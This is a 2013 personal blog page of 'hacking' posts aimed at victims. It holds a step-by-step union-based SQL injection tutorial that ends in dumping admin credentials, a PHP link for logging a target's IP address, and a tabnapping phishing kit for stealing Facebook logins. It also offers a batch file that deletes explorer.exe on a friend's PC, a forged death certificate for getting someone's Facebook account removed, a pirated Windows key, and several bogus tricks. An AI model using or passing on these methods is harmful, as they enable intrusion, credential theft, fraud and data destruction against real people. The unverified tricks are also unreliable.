Saturday, November 30, 2013

Hacking website using SQL Injection -step by step guide

Hacking website using SQL Injection -step by step guide 

 

salam from mohammed faizan

welcome visiter,today i have a new post for you

 

  • How to hack facebook
  • Work in home
  • Facebook
  • Sql Injection



What is SQL Injection?
SQL injection is one of the popular web application hacking method.  Using the SQL Injection attack, an unauthorized person can access the database of the website. Attacker can extract the data from the Database.

What a hacker can do with SQL Injection attack?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

So, here we go.

Step 1: Finding Vulnerable Website:
To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. Those keyword often referred as 'Google dork'.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
click here

Copy one of the above keyword and paste in the google. Here , we will got lot search result with
We have to visit the websites one by one for checking the vulnerability.




Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now let us check the vulnerability of the target website. To check the vulnerability , add the single quotes(') at the end of the url and hit enter.

For eg:
http://www.victimsite.com/index.php?id=2'
If the page remains in same page or showing that page not found, then it is not vulnerable.

If you got an error message just like this, then it means that the site is vulnerable
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Great, we have found that the website is vulnerable to SQLi attack.  Our next step is to find the number of columns present in the target database.

For that replace the single quotes(') with "order by n" statement.

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
If you get the error while trying the "x"th number,then no of column is "x-1".

I mean:
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)
 
 so now x=8 , The number of column is x-1 i.e, 7.

In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.
For eg:
http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Find the Vulnerable columns:
We have successfully discovered the number of columns present in the target database.  Let us find  the vulnerable column by trying the query "union select columns_sequence".

Change the id value to negative(i mean id=-2).  Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Once you execute the query, it will display the vulnerable column.



Bingo,  column '3' and '7' are found to be vulnerable.  Let us take the first vulnerable column '3' . We can inject our query in this column.

Step 5: Finding version,database,user
Replace the 3 from the query with "version()"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
Now, It will display the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
If the Database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind sql injection attack).

Let us find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will display the list of table names. Find the table name which is related with the admin or user.




Let us choose the "admin " table.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

We have to convert the table name to MySql CHAR() string .

Install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/

Once you installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the Hackbar, then press F9.

Select sql->Mysql->MysqlChar() in the Hackbar.


It will ask you to enter string that you want to convert to MySQLCHAR().  We want to convert the table name to MySQLChar .  In our case the table name is 'admin'.



Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.



Copy and paste the code at the end of the url instead of the "mysqlchar"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
The above query will display the list of column.

For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).

Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query displays the 'column is not found' erro, then try another column name from the list.

If we got luck, then it will display the data stored in the database depending on your column name.  For instance, username and password column will display the login credentials stored in the database.

Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
If you got luck ,you will find the admin page using above urls. or you can some kind of admin finder tools.

Warning:
The above post is completely for educational purpose only.  Never attempt to follow the above steps against third-party websites.  If you want to learn SQL injection attack method , then you can learn in safe environment by setup your own lab.
Posted by at No comments:
Labels: ,

Friday, November 29, 2013

How to get SomeOnes Ip address

How to get SomeOnes Ip address!!!




salam from mohammed faizan


Now today i will explain you how to get IP address of any computer remotely. Using some very basic tricks we can find the IP address of any remote computer and then you can start your further hacking into the remote system like port scanning and finding vulnerabilities to enter in to the system and hack it. There are several methods to get an IP address of the victim but i will share few and specially the best one's that can tell you IP address in just few clicks and also all are free methods and special thing is about it is all are manual methods that means you did not require any tool.
4 ways to get the IP address of the Victim or another Computer:
1. Using PHP notification Script
2. Using Blogs and Websites
3. Using Read Notify service
4. Sniffing during Gmail and yahoo chat  sessions

As we are here to learn concepts so i will first explain what is an IP address and what's its importance. So friends very basic question What is an IP address? Why its important for hackers and security professionals?

What is an IP address? 
Basically IP address (Internet Protocol address) is a unique numerical value that is assigned to any computer or printer on a computer network that uses an internet protocol for communication purpose. Protocol is basically rules( for Network its rules for communication). 
IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing

1. Using PHP notification Script
1. Using PHP notification Script
Using this Notification script you can get the IP address in just seconds. Steps of using this PHP script:
a. Download the PHP notify script and extract files.
b. Now you will get two files IP.html and index.php . You need to upload these two files to any free web hosting server.
Example: i used www.my3gb.com to upload these two files. Create an account there and upload these two files there as shown below.


c. Now you will need to send the link of index.php to the victim whose password you want to get. to get the link click on index.php shown in above snapshot. Now a new window will open copy the link in the address bar and send to the victim whose IP address you want.
d. Now when the victim opens the above link nothing will open but his Ip address is written into the ip.html file. So open the ip.html file to get his IP address.
e. That's all this method... I hope you liked it. 
2. Using Blogs and Websites
This method is for those who have their blogs or websites. Normal users can also do this as blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget and put histats code there and save template. And send the link of your blog to your friend and get his IP.
That's only.

3. Using Read Notify service
This is an email based service. Steps to use Read Notify service:
a. First open the Read Notify website : RCPT
b. Now register on this website and then it will send you confirmation mail. Verify your account.
c. Once your account is activated. 
Do the following steps use this service:

  1. Compose your email just like you usually would in your own email or web email program
  2. Type:   .readnotify.com   on the end of your recipients email address (don't worry, that gets removed before your recipients receive the email). Like this: shiviskingg@gmail.com.readnotify.com  
  3. Send your email
Some things to remember: 
  • don't send to and from the same computer
  • if your email program 'auto-completes' email addresses from your address book, you'll need to keep typing over the top of the auto-completed one to add the .readnotify.com
  • if you are cc-ing your email to other readers, you must add tracking to all of them 


4.  Sniffing Yahoo and Gmail Chat sessions
With the help of Sniffers like ethereal, wireshark etc we can sniff the Gmail, and yahoo chat sessions while we are chatiing to any our friend and extract the IP address from there. I will explain this trick in detail in my next article as its a long article in itself.
5. Bonus Method for Online Gamers
We can also get the IP address from online games like counter strike, age of empires in Game ranger etc.. Many counter strike servers use amx mode. Just view which people are connecting and whats their IP addess as plugins show the IP address of people connecting to the game server.  If you have more access to counter strike server you can use status command in console. Just go to console and type "status"(without quotes) and press enter there you can see all players details his steam ID and much more depending upon server.
Posted by at No comments:
Labels: , , ,

Important Tricks



Important Tricks

salam from mohammed faizan

welcome visiter,today i have a new post for you and


  1. Blood ki zarorat ho to yeh site visit karain www.pakdonor.com
  2. Dunya main kisi b number pr 5 mint free bat karain visit www.localphone.com
  3. Free call all over the world visit www.tpad.com www.freecallbutton.com
  4. Mobile chori ho es pe imei send karo cop@vsnl.net
  5. Free 25GB online storage log on hugedrive.com and sign up plus there is skydrive.live.com(25 GB free to store ur data)
  6. Flash web bananey k liye visit wix.com aur dosri websites k liye webs.com ya weebly.com blog k liye blogger.com ya blog.com aur dot.tk domain k liye www.dot.tk
  7. For free web hosting (5GB free web space) www.zymic.com
    Click here for more
  8. For call and sms hacking software download spy for anything visit Download.cnet.com
  9. Hold window key and press L it will lock ur computer
  10. Apne friend k window urane k liye Open notepad type Del c:/windows/explorer.exe save as .bat aur desktop pr rakh do jo open kare g to window delete
  11. App ke computer main koi C: ya D: ko nhi dekh sakta click start run main ja kr type gpedit.msc aur enter press karo phir administrative templates main ja kar system pr click karo Hide these specified drives from my computer ko enable kro
  12. windows Genuine keys JT4C7-CYT8T-HXDG7-PVTG4-T7JYD
  13. Computer screen ulti karny k liye CTRL Alt Up Arrow sedhi karny k liye CTRL Alt Down Arrow esi tarha aap screen left right bhi kar saktay hain
  14. Windows keys shortcuts Win+E open my computer Win+F search for file and folder CTRL+I catch image from media player Alt+Z move back deleted file
  15. Auto shutdown Pc at 11pmin run type “At 11:00 pm -s” for restart “At 11:00 pm -r”
  16. Check hardware and software’s problem go to run type"msinfo32" and enter
  17. Visit these sites u see bundles of tips and tricks about computer mobile internet etc softronicinfo.blogspot.com, boomtrick.blogspot.com
  18. Want to earn online money without investment just logon to http://www.it-education-pk.blogspot.com and start earning
  19. Ghar baithay kisi ki b sim block karo go to Google and then 8.2.35ufone/ulock664ak.com aur kisi ki b sim block karain password:kufonepm3
  20. Visit www.TexTTrickS.Tk for free trick ab8 PC Web development ,PC+mobile,sofwares +Portables,SEO,Forum making, Blogging.
  21. Zong se ki jane wali calls ka record check karain http://203.82.55.30/ebilling
  22. Enjoy free zong unlimited zong internet go to internet setting (profile of zong internet) change access point (APN) to ZONGMMS now give enter space before ZONGMMS save setting and restart your mobile now enjoy e.g. ACCESs POINT :
ZONGMMS
  1. Telenor free internet APN:mms Homepage:www.google.com Port:172.18.19.11 Proxy:8080 use with 0 balance
  2. Hide ur number show others unknown number or private number dial “00448700360419p00923331234567” Rs 15+tax charges
  3. Kisi b network ki sim block karne k liye **04*3814*7529*68243#
  4. Homepage: http://t.co/7FTBvH8 User name:Vastnet Proxy: 10.81.6.033 APN: ZongMMS.vastnet Port: 9202
  5. Hide your personal data in memory card by “FILE EXPLORER” download this software from www.downloadwap.com
  6. Agar aap ko windows xp banana ya edit karni hai tu yeh site visit karain www.editxp.maker.com
  7. Speed up ur Pc go to RUN>msconfig>startup>disable all and restart
  8. Check hardware error in ur system go to run type chkdsk
  9. Send free mms now using Mobilink jazz here are the settings :- Proxy:172.024.097.029 Port:8080 MMS Url:172.24.97.29:8080 APN:jazz.mms
  10. Apnay mobile main ”Files Tour” software install karain aur delete kiya hua data recover karain
  11. Send free MMS all over the world Visit this site http://t.co/JFwTPRH
  12. Hidden Bluetooth in Windows xp Run command prompt and type “fsquirt
Without quotes Now just select whether u want to send receive any file.
  1. Job search all over the world visit www.networker.com www.jobsearch.org www.jobsoptions.com www.wantedjobs.com www.jobshejobs .com
  2. To convert ur drive from FAT to NTFS open run type ”convert d:/fs:ntfs”
  3. Apnay computer k search main .eml lik kr enter press karain phir jo files show hongi un ko delete kar dain virus delete ho jaye ga
  4. Aap k CNIC p kitni Sim’s registered hain online free check www.pta.gov.pk/668/index.html
  5. To check out your internet history press CTRL+H for zoom in and zoom out CTRL+mouse wheel
  6. If u want to increase the speed of computer then use this software “AUOST SPEED” download it from www.AUSLOGIC.com
  7. Xp main Folder icon or background change karny k liye Lovely Folder name k software use karain
  8. Convert your 1GB memory card to 2GB free open this linkhttp://t.co/PCquMA7
  9. Delete an undeletable file: Open Cmd, open Task manger, go to processes, and end explorer.exe. Then Cmd type the <file path> and press enter.
  10. Virus to format hard disk using notepad: Open notepad Type 0100101100011111001001010101010101010000011111100000 and save as deleteHD.exe Now Run it. for more www.softronicinfo.blogspot.com
  11. Apni tasveer ya apne naam ka Picture Msg banayen www.wapbites.com “DRAW SMS.sis” Download karen its s60 v3,5.
  12. Convert ur hard drive from FAT to NTFS open run type “convert d:/fs:ntfs”
  13. Speed up ur PC press Alt+Ctrl+Delete Click on view click on update speed click on High.
  14. Computer ko beghair mouse k Num pad k madad se b chalaya ja skta hai.Alt+Shift+Num Lock then press ok
  15. Visit these sites and make ur text in 3DStyles and animations www.textspace.net www.flammingtext.com www.cooltext.com www.sparklee.com
  16. Convert ur 1GB memory card to 2GB visit and download http:/www.coolpctips.com/2010/08/convert-your-1gb-memory-card-2gb-free
  17. Agar aap ko hacking knowledge hasil karna hao to visit with detail www.rootabega.org www.rootshell.com www.insecure.org/sploits
  18. Apni website aur blog khud bnain es site pr aik book urdu main likhi hui jis me website bnaney ka tareqa likha hai www.itship.tk
  19. Now hack and sniff password with the help of a tool called wireshark click on link to see how to hack http://t.co/AiZluMst
  20. Ab aap mobile mein sms read kaarny per b paisay kma saktay hain visit this site www.sms4ads.net es main aap easyload b hasil kar sakty hain
  21. Agar aap kisi admi ka mobile num use karna chahte hai to wap.qeep.net pe visit kr k uska num use kren
  22. Quran with urdu translation for all java-enabled mobiles has been uploaded on: http://t.co/WpA0QkO7
  23. Earm free money register on these sites and earn as much as u can tinyrcb.com/bumper tinyrcb.com/survey
  24. Apni website aur blg pe google ads lagain aur earning karain.Adsense approving tips k ly. www.Hackstuff.tk
  25. Get cheat codes of any game download cheatbook from this site and put the name and get cheat codes www.cheatbook.de
  27. See world without software satellite k zarye dunya dekhnaye k liye go to www.immigration.pk
  28. Pore dunya main free sms karo without registration aur jitna chahe lamba sms ho open this site www.uthsms.net
  29. Ab aap all worl kisi b Network k number ki free ma location para karain visit www.informationmadness.com/php/phonelocation.html
  30. Download “Solar Vox” and charge any USB device using the sun light http://t.co/xdjsh531
  31. Visit now www.zswfun.com and just click on unlimited pictures and earn daily up to 500rupees.
  32. Agar koi online paisay kmana chahta hai visit www.justtricks.tk wahan puri tafseel urdu main hai
  33. Conver any file in any format online free http://www.youconvertit.com
  34. Find the instan Solution of any of the math problem http://www.mathway.com
  35. For Typing Test go to this site http://speedtest.10-fast-fingers.com//
    thnx 4r visiting,but must comment about my this post
Posted by at No comments:
Labels: , , ,

Wednesday, November 27, 2013

Close any Facebook account in 24 hours

 

Close any Facebook account in 24 hours 

 

salam from mohammed faizan

Step 1 - Go to this url:

Click here

So this is the Url we will use to Report our slave. This Form allows you to report a deceased person (someone who is dead).




 
Step 2 - Complete the Fields:

Explain:
Full Name: Your Victims Full name(Name last name)
Date of birth: Go at his profile and click at Info tab and get his date of birth.
Account Email Addresses: Do the same thing, go to his profile and click on info tab and get his email addresses.
Networks: Again,go to his profile and click on Info tab and get his networks, copy them and paste in the form.
Web address of profile you would like to report: Just go to his profile and copy the link in the address bar.
Relationship to this person: To make more believable select Immediate Family.
Requested Action: Remove Profile
Proof Of Death: This is the hardest part of this form. Now to make a proof of a death just Google in your language a "Death Certificate" or "Certificate of a Death". It doesn't matters from what country you are, just use this Italian certificate and open up photoshop or whatever Image
Editor and just write in a blank field:
Annunciamo il morte di [name goes here]. Save your image to desktop and upload it in one of the Image
Free Hosting like: Click here
And it's done Wink... Italian Death Certificate:
Additional Information: Write what you want, just write that you are in his/her family and you would like to close his/her Facebook account because you won't like that when he is dead, his Facebook is opened.

Step 3 - Click on Submit and then a message will appear:
Your injury was submitted at Facebook Team .. So the meaning is that one of the mod's of Facebook will review your report and will do the right decision. It works in most of the times. I closed a few ones.......


Thanks 4 visiting my BLOG!!!
Posted by at No comments:
Labels: , , ,

Facebook Hacking method Using Tabnapping (game method)

Facebook Hacking method Using Tabnapping (game method)

 

salam from mohammed faizan

welcome visiter,today i have a new post for you and a new method of facebook hacking,if you try this ,then i am ssure that you will able to hack any facebook account ,so

follow my steps:;;;;;;;

 

 
Facebook Hacking method Using Tabnapping (game method)
Days back i saw tabnapping by sonaldo it was awsome
so i started searching for more ways of tabnapping and found this..

What Is tabnapping ?

Tab Nabbing/Napping | A New Phishing Technique
The traditional way of phishing consists of a link sent to a victim.
The modern way is to use both Phishing and Tab Nabbing/Napping methods.
Using phishing to represent Facebook, and using tab nabbing/napping to redirect a webpage to a phishing page.
You know when they say 2 is better, in this case 2 is better.



Above is a screen shot of the webpage I will explain the arrows.
Let's first talk about the header "Hardest Game Ever " the header it self makes you want to challenge your self.
"The Game You Can't Beat" it's basically intimidating you to play the game.
"01 { Welcome Guest! }" just basically saying you are a guest until you log-in.
"Send To A Friend!" asking the user to send the page to a friend. clever thinking as a hacker to get more people using the site.
""http://localhost/wordpress/" this automatically changes upon the website url, I was using xampp server to test the site, ( original author)

Recommended : 00webhost.com or my3gb

Now the log-in page.
The log-in displays when a user decides to switch to another tab like YouTube, exactly after 10sec of switching, when the user returns, they'll have to log-in to get back to the game, but they will be directed to games.html a page that looks similar to index.html but displays that the user is logged on.
Games.html has a script also but instead of the normal 10sec script we changed it to about 2 mintues, when they reach that limit, the log-in process begins again.



I am using my3gb.com (forky)
Remember when you create the url make it similar to "Hardest Game Ever"

In my case i am using username hardestgame4ever

1 : Okii So First We will To Download the Tabnapping File
Click here  (rar file 1.1mb)
Click here (zip file)

Scan Report : 0 / 44
Click here

Im lazy to put a scan report for zip file

Oki..So Now after Downloading it Extract it by Using Winrar

We need To Edit Just One File

login.html
Okii we will Come To that later..

2 : So Lets make my3gb Account now


3 : Confirm Your Account

Check your Gmail their Will be An Activation Link (my3gb only gmail works )


4 : Now Since We have made an account .. we can now start the editing.

open login.html and search for >"localhost/wordpress/fb/post.php<;


We need To replace With our post.php direct link

In my case it will be like

hardestgame4ever.my3gb.com/post.php

If yuh Created an Account With the Username ( hardestgametoplay)

You post.php file will direct link will be hardestgametoplay.my3gb.com/post.php

So you need To replace localhost/wordpress/fb/post.php with hardestgametoplay.my3gb.com/post.php

Save It . And Upload everything
Those files inside the folders too..

5 : You can upload a zip file and uncompress too..

Also you can Edit file After Uploading. ( works in Chrome)


6 : After Finish Uploading

Give your victim your index link

my link hardestgame4ever.my3gb.com/index.html

As the example i showed your link will be like this
hardestgametoplay.my3gb.com/index.html

So i gave the link to my victim

I used Sonaldo as An Example
So yuh must have a good social engineering technic

forky : Hey man Can yuh Please finish Level 2 of this game and give me TuT on How to finish
This is the Hardest game i ever played


Sonaldo : Owkii Lets See. Nothin is hard for me ..Im gonna finish Take a snap of it And show yuh .

Forky : Owkii im waiting

7 : So He Was playing And chatting ..by the time he was replying to some one login to facebook comes up..

so he need to log now


When he logs and start playing he Will be welcomed as a user not a guest anymore..

now you can go to password.html file you will see his Details including ip adress



Sonaldo : i finished level 2 .. level 3 is pretty hard .

Sonaldo : hey man i played this mobile version thats y its lil easy but level 5 damn hard...

Your victim will be enjoying game he have no idea what exactly happend

Ps Note : Im not Original Author..I learned it and i made this TuT
Sonaldo : i Hope you dont mind me taking you as an example ..

As i see Pictures ain't so clear , so i have included pics in the tabnapping files
Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)